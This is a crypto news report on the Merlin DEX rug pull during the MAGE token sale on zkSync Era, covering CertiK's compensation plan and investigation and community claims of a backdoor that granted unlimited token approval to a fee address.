Blockchain security firm CertiK is launching a compensation plan with Ethereum’s Layer 2 scaling platform zkSync Era to cover $2 million lost during a public sale of MAGE tokens from decentralized exchange Merlin.
In a statement to Cointelegraph on April 26, CertiK reiterated that it is investigating the exit scam and has also recruited the remaining Merlin team to start the compensation plan. The company said:
“Early investigations indicate that rogue developers are based in Europe, and CertiK will work with law enforcement to track them down if direct negotiation is unsuccessful.”
The blockchain security company urges the rogue developer to return 80% of the stolen funds, awarding the remaining 20% as an ethical hacker bounty.
The firm also noted that the private key privileges are “committed to helping affected users” even though they are outside the scope of a smart contract audit.
Merlin lost around $850,000 worth of USD Coin (USDC) and a few more relatively illiquid tokens on April 26 during its three-day public MAGE token sale with no estimated limit. Blockchain data suggests that an attacker with control over the liquidity pool was able to easily siphon off the funds.
We did some research on Merlin smart contracts and we identified the malicious code responsible for the draining of funds.
These two lines of code in the initialize function are essentially granting approval for the feeTo address to transfer an unlimited (type(uint256).max)… pic.twitter.com/mIksh4HkhB
— eZKalibur ∎ (@zkaliburDEX) April 26, 2023
CertiK, which audited the Merlin code, answered with their initial conclusions pointing to a “potential private key management problem.”
We’re actively investigating the @TheMerlinDEX incident. Initial findings point to a potential private key management issue rather than an exploit as the root-cause.
While audits cannot prevent private key issues, we always highlight best practices to projects.
Should any foul…
— CertiK (@CertiK) April 26, 2023
The crypto community on Twitter questioned the CertiK audit, giving to understand that it could have been a rug pull.
Verichains founder Thanh Nguyen alluded to a “back door” present in Merlin’s code, stating that it is a “clear security risk, as there is no use case that requires its approval.”
3/4 However, in the Merlin code, there is a “backdoor” code (L87-88) that allows the feeTo of MerlinFactory to transfer all assets in the pair, in addition to the fee in the swap function. This backdoor is a clear security risk as there is no use case that requires its approval. pic.twitter.com/HAnwZT27ZS
— Thanh Nguyen (@redragonvn) April 26, 2023
“While audits can identify potential risks and vulnerabilities, they cannot prevent malicious activity by rogue developers, such as rug pulls,” CertiK said in a statement to Cointelegraph. “We encourage users to look for projects with a ‘KYC flag’ as an added layer of security, which means that the project has voluntarily gone through a KYC vetting process.”
The company explained that doing so can help reduce and mitigate the risk of insider threats, such as rug pulls.
CertiK said it would continue to provide updates on its compensation plan and the current investigation.
Clarification: The information and/or opinions expressed in this article do not necessarily represent the views or editorial line of Cointelegraph. The information presented here should not be taken as financial advice or investment recommendation. All investment and commercial movement involve risks and it is the responsibility of each person to do their due research before making an investment decision.
Investments in crypto assets are not regulated. They may not be suitable for retail investors and the entire amount invested may be lost. The services or products offered are not directed or accessible to investors in Spain.